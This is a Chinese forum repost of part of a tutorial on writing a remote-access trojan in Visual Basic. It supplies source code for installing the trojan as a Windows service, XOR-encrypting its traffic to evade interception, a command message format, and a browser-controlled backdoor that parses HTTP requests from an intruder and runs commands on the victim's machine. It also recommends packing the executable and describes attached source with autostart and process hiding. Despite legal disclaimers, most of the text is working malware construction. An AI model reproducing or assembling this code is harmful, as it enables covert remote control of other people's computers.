HanDs
NO.2

[Visual Studio文章] 真正的VB木马,不用WINSOCK控件(3) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

VB代码(代码比较长,文章附源代码文件):
===================================================
Public Const SERVICE_WIN32_OWN_PROCESS = &H10&
Public Const SERVICE_WIN32_SHARE_PROCESS = &H20&
Public Const SERVICE_WIN32 = SERVICE_WIN32_OWN_PROCESS + _
SERVICE_WIN32_SHARE_PROCESS

Public Const SERVICE_ACCEPT_STOP = &H1
Public Const SERVICE_ACCEPT_PAUSE_CONTINUE = &H2
Public Const SERVICE_ACCEPT_SHUTDOWN = &H4

Public Const SC_MANAGER_CONNECT = &H1
Public Const SC_MANAGER_CREATE_SERVICE = &H2
Public Const SC_MANAGER_ENUMERATE_SERVICE = &H4
Public Const SC_MANAGER_LOCK = &H8
Public Const SC_MANAGER_QUERY_LOCK_STATUS = &H10
Public Const SC_MANAGER_MODIFY_BOOT_CONFIG = &H20

Public Const STANDARD_RIGHTS_REQUIRED = &HF0000
Public Const SERVICE_QUERY_CONFIG = &H1
Public Const SERVICE_CHANGE_CONFIG = &H2
Public Const SERVICE_QUERY_STATUS = &H4
Public Const SERVICE_ENUMERATE_DEPENDENTS = &H8
Public Const SERVICE_START = &H10
Public Const SERVICE_STOP = &H20
Public Const SERVICE_PAUSE_CONTINUE = &H40
Public Const SERVICE_INTERROGATE = &H80
Public Const SERVICE_USER_DEFINED_CONTROL = &H100
Public Const SERVICE_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or _
SERVICE_QUERY_CONFIG Or _
SERVICE_CHANGE_CONFIG Or _
SERVICE_QUERY_STATUS Or _
SERVICE_ENUMERATE_DEPENDENTS Or _
SERVICE_START Or _
SERVICE_STOP Or _
SERVICE_INTERROGATE Or _
SERVICE_USER_DEFINED_CONTROL)

Public Const SERVICE_DEMAND_START As Long = &H3

Public Const SERVICE_ERROR_NORMAL As Long = &H1

Public Enum SERVICE_CONTROL
SERVICE_CONTROL_STOP = &H1
SERVICE_CONTROL_PAUSE = &H2
SERVICE_CONTROL_CONTINUE = &H3
SERVICE_CONTROL_INTERROGATE = &H4
SERVICE_CONTROL_SHUTDOWN = &H5
End Enum

Public Enum SERVICE_STATE
SERVICE_STOPPED = &H1
SERVICE_START_PENDING = &H2
SERVICE_STOP_PENDING = &H3
SERVICE_RUNNING = &H4
SERVICE_CONTINUE_PENDING = &H5
SERVICE_PAUSE_PENDING = &H6
SERVICE_PAUSED = &H7
End Enum

Public Type SERVICE_TABLE_ENTRY
lpServiceName As String
lpServiceProc As Long
lpServiceNameNull As Long
lpServiceProcNull As Long
End Type

Public Type SERVICE_STATUS
dwServiceType As Long
dwCurrentState As Long
dwControlsAccepted As Long
dwWin32ExitCode As Long
dwServiceSpecificExitCode As Long
dwCheckPoint As Long
dwWaitHint As Long
End Type

Public Declare Function OpenSCManager Lib "advapi32.dll" Alias _
"OpenSCManagerA" (ByVal lpMachineName As String, _
ByVal lpDatabaseName As String, ByVal dwDesiredAccess As Long) As Long
Public Declare Function CloseServiceHandle Lib "advapi32.dll" (ByVal hSCObject _
As Long) As Long
Public Declare Function OpenService Lib "advapi32.dll" Alias "OpenServiceA" _
(ByVal hSCManager As Long, ByVal lpServiceName As String, _
ByVal dwDesiredAccess As Long) As Long
Public Declare Function StartService Lib "advapi32.dll" Alias "StartServiceA" _
(ByVal hService As Long, ByVal dwNumServiceArgs As Long, _
ByVal lpServiceArgVectors As Long) As Long
Public Declare Function ControlService Lib "advapi32.dll" (ByVal hService As _
Long, ByVal dwControl As Long, lpServiceStatus As SERVICE_STATUS) As Long
Public Declare Function StartServiceCtrlDispatcher _
Lib "advapi32.dll" Alias "StartServiceCtrlDispatcherA" _
(lpServiceStartTable As SERVICE_TABLE_ENTRY) As Long
Public Declare Function RegisterServiceCtrlHandler _
Lib "advapi32.dll" Alias "RegisterServiceCtrlHandlerA" _
(ByVal lpServiceName As String, ByVal lpHandlerProc As Long) _
As Long
Public Declare Function SetServiceStatus _
Lib "advapi32.dll" (ByVal hServiceStatus As Long, _
lpServiceStatus As SERVICE_STATUS) As Long
Public Declare Function CreateService _
Lib "advapi32.dll" Alias "CreateServiceA" _
(ByVal hSCManager As Long, ByVal lpServiceName As String, _
ByVal lpDisplayName As String, ByVal dwDesiredAccess As Long, _
ByVal dwServiceType As Long, ByVal dwStartType As Long, _
ByVal dwErrorControl As Long, ByVal lpBinaryPathName As String, _
ByVal lpLoadOrderGroup As String, ByVal lpdwTagId As String, _
ByVal lpDependencies As String, ByVal lp As String, _
ByVal lpPassword As String) As Long
Public Declare Function DeleteService _
Lib "advapi32.dll" (ByVal hService As Long) As Long

Public hServiceStatus As Long
Public ServiceStatus As SERVICE_STATUS

Public Const SERVICE_NAME As String = "NT-Service" '服务名

Sub ServiceMain(ByVal dwArgc As Long, ByVal lpszArgv As Long)
Dim B As Boolean
Dim U As Long
Dim Z As Long
'初始化
ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS
ServiceStatus.dwCurrentState = SERVICE_START_PENDING
'设置状态
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP _
Or SERVICE_ACCEPT_PAUSE_CONTINUE _
Or SERVICE_ACCEPT_SHUTDOWN
ServiceStatus.dwWin32ExitCode = 0
ServiceStatus.dwServiceSpecificExitCode = 0
ServiceStatus.dwCheckPoint = 0
ServiceStatus.dwWaitHint = 0

hServiceStatus = RegisterServiceCtrlHandler(SERVICE_NAME, _
AddressOf Handler)
ServiceStatus.dwCurrentState = SERVICE_START_PENDING
B = SetServiceStatus(hServiceStatus, ServiceStatus)

ServiceStatus.dwCurrentState = SERVICE_RUNNING
B = SetServiceStatus(hServiceStatus, ServiceStatus)
End Sub

Sub Handler(ByVal fdwControl As Long)

Dim B As Boolean
Dim U As Long

Select Case fdwControl


Case SERVICE_CONTROL_PAUSE
ServiceStatus.dwCurrentState = SERVICE_PAUSED

Case SERVICE_CONTROL_CONTINUE
ServiceStatus.dwCurrentState = SERVICE_RUNNING

Case SERVICE_CONTROL_STOP
ServiceStatus.dwWin32ExitCode = 0
ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING
ServiceStatus.dwCheckPoint = 0
ServiceStatus.dwWaitHint = 0
B = SetServiceStatus(hServiceStatus, ServiceStatus)
ServiceStatus.dwCurrentState = SERVICE_STOPPED

Case SERVICE_CONTROL_INTERROGATE
Case Else
End Select
B = SetServiceStatus(hServiceStatus, ServiceStatus)

End Sub

Function HandlerEx(ByVal command As Long) As Boolean
Dim hSCM As Long
Dim hService As Long
Dim res As Long
Dim lpServiceStatus As SERVICE_STATUS

If command < 0 Or command > 3 Then Err.Raise 5

hSCM = OpenSCManager(vbNullString, vbNullString, GENERIC_EXECUTE)
If hSCM = 0 Then Exit Function

hService = OpenService(hSCM, SERVICE_NAME, GENERIC_EXECUTE)
If hService = 0 Then GoTo CleanUp

Select Case command
Case 0
res = StartService(hService, 0, 0)
Case SERVICE_CONTROL_STOP, SERVICE_CONTROL_PAUSE, _
SERVICE_CONTROL_CONTINUE
res = ControlService(hService, command, lpServiceStatus)
End Select
If res = 0 Then GoTo CleanUp

ServiceCommand = True

CleanUp:
If hService Then CloseServiceHandle hService
CloseServiceHandle hSCM

End Function


Function FncPtr(ByVal fnp As Long) As Long
FncPtr = fnp
End Function

Sub Main()
On Error Resume Next
Dim hSCManager As Long
Dim hService As Long
Dim ServiceTableEntry As SERVICE_TABLE_ENTRY
Dim B As Boolean
Dim cmd As String
Dim U As Long

cmd = Trim(LCase(command()))
Select Case cmd
Case "-uninstall"
If CheckIsNT = False Then End: Exit Sub
hSCManager = OpenSCManager(vbNullString, vbNullString, _
SC_MANAGER_CREATE_SERVICE)
hService = OpenService(hSCManager, SERVICE_NAME, _
SERVICE_ALL_ACCESS)
DeleteService hService
CloseServiceHandle hService
CloseServiceHandle hSCManager
End

Case "-install"
If CheckIsNT = False Then Load frmMain: Exit Sub
'安装NT-Service
hSCManager = OpenSCManager(vbNullString, vbNullString, _
SC_MANAGER_CREATE_SERVICE)
hService = CreateService(hSCManager, SERVICE_NAME, _
SERVICE_NAME, SERVICE_ALL_ACCESS, _
SERVICE_WIN32_OWN_PROCESS, _
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, App.Path & "\" & App.EXEName & ".EXE", vbNullString, _
vbNullString, vbNullString, vbNullString, _
vbNullString)
CloseServiceHandle hService
CloseServiceHandle hSCManager
DoEvents
Shell Path & App.EXEName & ".EXE" '重新启动EXE
End

Case Else
'启动NT-Service
If CheckIsNT = False Then Load frmMain: Exit Sub
ServiceTableEntry.lpServiceName = SERVICE_NAME
ServiceTableEntry.lpServiceProc = FncPtr(AddressOf ServiceMain)
B = StartServiceCtrlDispatcher(ServiceTableEntry)
Load frmMain '加载窗体,开始运行程序主体
End Select
End Sub
===================================================

十二、报文加密和报文格式
由于木马有时候传输的是敏感信息,而且数据包会被拦截分析,因此必须尽量少用不经过任何处理的明文传递数据,而是把明文数据加密成乱字符密文后发送,确保不被人伪造假命令或者窃取信息。
加密的思路其实不用很复杂,只要把它理解为货物出站时加一个包装箱,接收方拿到货物后打开箱子就可以了,只需在send时把字符串进行加密(Encrypt)就可以,对方recv后立即解密(Decrypt)就得到原始数据,接下来如何处理就看后面的代码了,例如:
===================================================
'加密后发送数据
rc = Encrypt(rc, "a") '加密
SendData wParam, rc

'接收并解密
Do
szBuf = String(256, 0)
lRet = recv(wParam, ByVal szBuf, Len(szBuf), 0)
If lRet > 0 Then sData = sData + Left$(szBuf, lRet)
Loop Until lRet <= 0
sData = Decrypt(sData, "a")
sData = Trim$(sData)
===================================================

加密的方式有很多种,具体用哪种并不重要,重要的是,这种加密是否很容易被破译,最简单的一种方法是把原始数据的每个字符ASCII代码都减去1,这样出来的数据也可以算是面目全非了,接收后再把它们的ASCII值加上1即可。但是要想做比较强的加密,我推荐用密钥加密,破译的难度至少大一些。

VB代码:
===================================================
'解密
Function Decrypt(PlainStr As String, key As String)
Dim Char As String, KeyChar As String, NewStr As String
Dim Pos As Integer
Dim i As Integer, Side1 As String, Side2 As String
Pos = 1

If Len(PlainStr) Mod 2 = 0 Then
Side1 = StrReverse(Left(PlainStr, (Len(PlainStr) / 2)))
Side2 = StrReverse(Right(PlainStr, (Len(PlainStr) / 2)))
PlainStr = Side1 & Side2
End If

For i = 1 To Len(PlainStr)
Char = Mid(PlainStr, i, 1)
KeyChar = Mid(key, Pos, 1)
NewStr = NewStr & Chr(Asc(Char) Xor Asc(KeyChar))
If Pos = Len(key) Then Pos = 0
Pos = Pos + 1
Next i

Decrypt = NewStr
End Function

'加密
Function Encrypt(PlainStr As String, key As String)
Dim Char As String, KeyChar As String, NewStr As String
Dim Pos As Integer
Dim i As Integer, Side1 As String, Side2 As String
Pos = 1

For i = 1 To Len(PlainStr)
Char = Mid(PlainStr, i, 1)
KeyChar = Mid(key, Pos, 1)
NewStr = NewStr & Chr(Asc(Char) Xor Asc(KeyChar))
If Pos = Len(key) Then Pos = 0
Pos = Pos + 1
Next i

If Len(NewStr) Mod 2 = 0 Then
Side1 = StrReverse(Left(NewStr, (Len(NewStr) / 2)))
Side2 = StrReverse(Right(NewStr, (Len(NewStr) / 2)))
NewStr = Side1 & Side2
End If

Encrypt = NewStr
End Function
===================================================

除了加密,报文的格式也是重要的。没有制作经验的初学者往往不明白格式的重要性,而是直接把数据不加修饰的发送出去,如果功能少点还可以,如果功能多了,出错的机会也就大了。有的新手直接把汉字或其他非英文字符直接发出去,这更会引起不必要的麻烦,因为全世界并不是只有中国,也不是只有中文Windows,世界上还有韩文Windows、英文Windows等不支持中文内码的操作系统,它们会导致你的木马返回的数据变成乱码,正如在中文Windows上运行BIG5内码程序或日文内码程序一样。
没必要为报文格式定个标准,只要是自己处理起来方便的就可以。例如下面的报文:

HBUTROJAN/.../550/.../NOTWRITE/.../c:\windows\win.ini

我用“/.../”划分这个报文区域,因为这样的分割标记不容易被一些例外数据干扰,把分隔符去除后得到:

[前导标记] [ASCII代码] [信息1] [信息2]

客户端/服务端程序接收翻译部分代码的分解:
1.[前导标记] 预先定义为HBUTROJAN,如果用InStr或Left得不到这个数据,则表示程序接收到的数据并非服务端/客户端发送来的,跳出处理过程。如果含有这个标记,则进行下一个区域的处理。
2.[ASCII代码] 用数字做标识码,分别对应不同情况,例如200代表正常,404代表文件未找到,550表示权限拒绝等。
3.[信息1] 这里用于进一步解释返回的数据含义。
4.[信息2] 补充说明。
所以HBUTROJAN/.../550/.../NOTWRITE/.../c:\windows\win.ini经过翻译后可以知道要表达的是:无法写入文件 c:\windows\win.ini
经过这样的格式处理,把详细资料都放在程序内部进行翻译,而不是直接把要做的事传来传去,“含蓄”的木马通常可以让人摸不到头脑,呵呵。

十三、B/S模式
浏览器-服务器模式(Browser-Server,B/S)提供了一种简便的交互界面,无需专用的Client连接。Server端在受害者的机器等待入侵者用Internet Explorer等浏览器来发送命令,并以HTML页面方式返回返回数据。
要制作基于B/S模式的木马,前提是了解HTTP协议和基础的HTML制作,你不用学会制作复杂的表格,但是必须会最基本的表单提交,这是Browser与Server交互的唯一方式。

1.HTTP协议
HTTP协议使用TCP协议和明文字符传递数据,一个基本的HTTP请求如下(<CR>代表换行符):
===================================================
GET /index.htm HTTP/1.0<CR>
Accept:*/*<CR>
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)<CR>
Host:www.target.com<CR>
<CR>
<CR>
===================================================
HTTP请求可以略分为3个分段:
1.基本数据:GET /index.htm HTTP/1.0<CR>
表示用GET方法请求根目录的index.htm,使用HTTP1.0的协议版本,用换行符表示结束。
2.附加数据:Accept:*/*<CR>
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)<CR>
Host:www.target.com<CR>
跟随在HTTP/1.0后一行开始的字符无论有多少,都只是一种附加数据,用于详细说明该次HTTP请求需要什么细节设置,一般比较重要的是Set-Cookie和Referer信息。
3.结束标志:<CR><CR>(两个换行符)
这是表示HTTP请求结尾的标志,服务器必须接收到至少2个换行符才会对这次的HTTP报文进行处理。
根据HTTP报文格式,按照理论我们可以从基本数据段和附加数据段去开发B/S,但是由于浏览器不能让我们自定义附加数据,所以实际上只有用基本数据来控制木马。

2.最重要的HTML交互——表单提交
相信大家都知道在HTML页面里点击一个按钮发表文章帖子,这时候浏览器的后台操作是怎么样的呢?例如这段表单:
<form action="register"><p size=9px> 名字 <input type="text" name="UserName"></p><p> 年龄 <input name="Age" type="text"></p><input type="submit" value="注册"></form>

用工具捕获IE输出,可以看到点击按钮后实际是发送了以下HTTP请求:
PUT /register?UserName=LK007&Age=18 HTTP/1.0
Accept:text/html
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Host:www.target.com

虽然里面有我们需要的数据,但是无用数据也太多了,所以必须用一段代码去除枝叶,保留核心。
===================================================
Function ProcHTTP(strData As String) As String
'去除HTTP请求中的基本数据头尾、附加数据、结束标志
'AuthorK007
'使用方法:字符变量=ProcHTTP([HTTP报文])
On Error Resume Next
Dim FindGet As Integer, FindPost As Integer, spc2 As Integer
If Mid$(strData$, 1, 3) = "GET" Then '如果以GET开头
FindGet = InStr(strData$, "GET ")
spc2 = InStr(FindGet + 5, strData$, " ") ' 取得第二个空格分隔符位置(“HTTP”字符)
ProcHTTP = Trim$(Mid$(strData$, FindGet + 4, spc2 - (FindGet + 4))) '分离数据
ElseIf Mid$(strData$, 1, 4) = "OST" Then '如果以POST开头
FindPost = InStr(strData$, "OST ")
spc2 = InStr(FindPost + 5, strData$, " ") '取第二个空格
ProcHTTP = Trim$(Mid$(strData$, FindPost + 5, spc2 - (FindPost + 5))) '分离数据
End If
End Function
===================================================
一个完整的HTTP请求经过这段代码后变成:

/register?UserName=LK007&Age=18

这才是我们需要的核心部分,分析它的报文格式:

[目标文件]?[附加数据1=数据]&[附加数据2=数据]&..............

应用在木马中,可以这样理解:
[命令]?[参数1=值]&[参数2=值]&......
例如:/writefile?filename=c:\windows\desktop\user.txt&text=hello,nice%20to%20meet%20you
它表示用写入文件的命令往c:\windows\desktop\user.txt写入内容“hello,nice to meet you”,浏览器输出的中文和特殊字符报文必须经过URL编码,因此空格被编码成了%20。

3.B/S交互制作
(1).输出HTML
鉴于TCP协议的木马都是开个端口监听,和HTTP服务没什么两样,因此不必为B/S模式接收部分编写另外的代码,直接在recv里判断报文是否以GET/PUT开头即可。如果是一个HTTP请求则执行一段预先写好的HTML页面输出过程,例如:

===================================================
Function DefaultHTML()
On Error Resume Next
Dim x As String
x = "HTTP/1.1 200 OK" & vbCrLf
x = x & "Server: HBU Trojan" & vbCrLf & vbCrLf
x = x & vbCrLf & "<HTML><HEAD><TITLE>B/S Example .:owered by 小金::.</TITLE>" & _
"<META content=""text/html; charset=gb2312"" http-equiv=Content-Type>" & _
"</HEAD><BODY aLink=#ffffff bgColor=#4f9fdf bottomMargin=0 leftMargin=0 rightMargin=0 topMargin=0 vLink=#ffffff>" & _
"<p align=""center""><b><font size=""6"" color=""#000066"">显示目录</font></b></p>" & _
"<hr width=""100%"" size=""1"" color=""#FFFFFF"" ><table width=""100%"" border=""0"" cellspacing=""0"" cellpadding=""0""><tr><td width=""41%""><form action=""dir""><p size=9px> 路径 <input type=""text"" name=""directory"" value=""c:\""></p><p> 文件类型 <input name=""filter"" type=""text"" value=""*.*""></p><input type=""submit"" value=""显示""></form></td></tr></table><hr width=""100%"" size=""1"" color=""#FFFFFF"" ><p align=""center""><font face=""Arial"" size=""2"" color=""#FFFFFF""><b>© 2003 小金 制作 </b></font></p></BODY></HTML>"
DefaultHTML = x
End Function
===================================================
这段代码输出一个包含HTML内容的字符串,用Winsock发送出去就显示成一个简单的HTML页面了。

(2).表单提交和控制
先看一段表单模型:
<form action=[控制命令]><p>[内容描述]<input type="text" name=[参数1]></p><p>[内容描述2]<input type="text" name=[参数2]></p><input type="submit" value=[描述]><form>
注意<input type="submit" value=[描述]>,这是个提交按钮,必须省略它的NAME属性(完整的提交按钮格式是<input type="submit" name=[参数] value=[描述]>),否则浏览器会在所有数据后追加一个附加数据用于表示按钮,这样我们前面提到的“/register?UserName=LK007&Age=18”就会变成“/register?UserName=LK007&Age=18&[按钮NAME]=[按钮Value]”,对程序分割命令段没什么好处。

服务端接收到一个HTTP请求并去除枝叶后,就要对它进行分解,把命令和参数分离。
例如:
/dir?directory=c:\&filter=*.*
VB代码分解:
===================================================
Dim strURL As String
Dim sCommand As String '命令
Dim sValue(15) As String '最大处理16个参数
Dim sTmp As String, sLength As Integer, i As Integer
strURL = "/dir?directory=c:\&filter=*.*"

strURL = Trim$(Right$(strURL, Len(strURL) - 1)) '去除"/"
sCommand = Left$(strURL, InStr(strURL, "?") - 1) '分割命令和参数

sTmp = Right(strURL, (Len(strURL) - Len(sCommand) - 1))

For i = 0 To 15
If InStr(sTmp, "&") = 0 Then sValue(i) = sTmp: Exit For
sValue(i) = Left$(sTmp, InStr(sTmp, "&") - 1)
sTmp = Right(sTmp, (Len(sTmp) - Len(sValue(i)) - 1))
Next

Select Case sCommand
Case "dir"
Dim sDir As String
Dim sFilter As String
For i = 0 To 15
If InStr(sValue(i), "directory=") <> 0 Then
sDir = Right$(sValue(i), Len(sValue(i)) - 10) 'Len("directory=")=10
ElseIf InStr(sValue(i), "filter=") <> 0 Then
sFilter = Right$(sValue(i), Len(sValue(i)) - 7) 'Len("filter=")=7
Else
End If
Next
Case .....
Case Else
End Select
===================================================
最终得到命令“dir c:\*.*”。
然后可以用多种方法执行这个命令,如Shell、CreateProcess等,把执行结果用一个HTML页面返回数据:
===================================================
Function OutputHTML(sData As String)
On Error Resume Next
Dim x As String
x = "HTTP/1.1 200 OK" & vbCrLf
x = x & "Server: HBU Trojan" & vbCrLf & vbCrLf
x = x & vbCrLf & "<HTML><HEAD><TITLE>B/S Example .:owered by 小金::.</TITLE>" & _
"<META content=""text/html; charset=gb2312"" http-equiv=Content-Type>" & _
"</HEAD><BODY aLink=#ffffff bgColor=#4f9fdf bottomMargin=0 leftMargin=0 rightMargin=0 topMargin=0 vLink=#ffffff>" & _
"<p align=""center""><b><font size=""6"" color=""#000066"">查看目录</font></b></p>" & _
"<hr width=""100%"" size=""1"" color=""#FFFFFF"" ><table width=""100%"" border=""0"" cellspacing=""0"" cellpadding=""0""><tr><td width=""41%""><p align=""center""><font color=""#FFFFFF"" size=""6""><b><font size=""7""><pre>" & sData & "</pre></font></b></font></p></td></tr></table><hr width=""100%"" size=""1"" color=""#FFFFFF"" ><p align=""center""><font face=""Arial"" size=""2"" color=""#FFFFFF""><b>© 2003 小金 制作 </b></font></p></BODY></HTML>"
OutputHTML = x
End Function
===================================================

4.与加密报文冲突的解决
由于HTTP使用明文传输,所以支持B/S模式的木马就必须用明文传输,这似乎与前面的报文加密冲突,其实只要在发送和接收的时候判断一下HTTP请求和HTML页面的特征字符串就可以了。
===================================================
'加密后发送数据
If InStr(rc,"<HTML><HEAD><TITLE>")=0 Then rc = Encrypt(rc, "a") '如果没有发现HTML特征就加密
SendData wParam, rc

'接收并解密
Do
szBuf = String(256, 0)
lRet = recv(wParam, ByVal szBuf, Len(szBuf), 0)
If lRet > 0 Then sData = sData + Left$(szBuf, lRet)
Loop Until lRet <= 0
If InStr(sData,"HTTP/") =0 Then sData = Decrypt(sData, "a") '如果没有HTTP请求的特征就解密
sData = Trim$(sData)
===================================================

限于篇幅问题,B/S控制就简单的介绍到这里了。

十四、编译和加壳
虽然去除了ActiveX,但是VB程序必须依靠VB运行库才能运行,所以推荐用VB5.0编译成EXE,因为Win9x没有自带MSVBVM60.DLL。加壳也是必要的,可以尽量减小VB程序的体积,也避免EXE文件被随意修改。用API写的VB木马一般可以将体积控制在64KB以下。

十五、源代码
附上一个简单的带有自启动、隐藏进程、NT-Service、B/S控制(端口80)的木马例子,希望能给大家带来一点制作经验。由于直接使用浏览器控制,所以就偷懒不写Client端了,实际应用中最好能让木马同时支持C/S、B/S。

补充说明

其实只要能实现相应的功能,没必要非要用VB去写.不过这篇文章对学习VB网络编程还是有帮助的,思路很好也有代码说明.其实关于控件只是给开发人员提供一些基本功能,节省开发时间用的,这也是爲何有专业人士开发自己的控件(功能可自定且功能较强).当然要对系统底层知识比较了解.其中B/S模式思路説的比较不错(本人认为用在木马上),当然这已经流行很久了.文章讲了挺多其他方面的,总体来説网友各取所用吧,总之希望这样的貼子经常能看到


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
真正 V B 木马
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组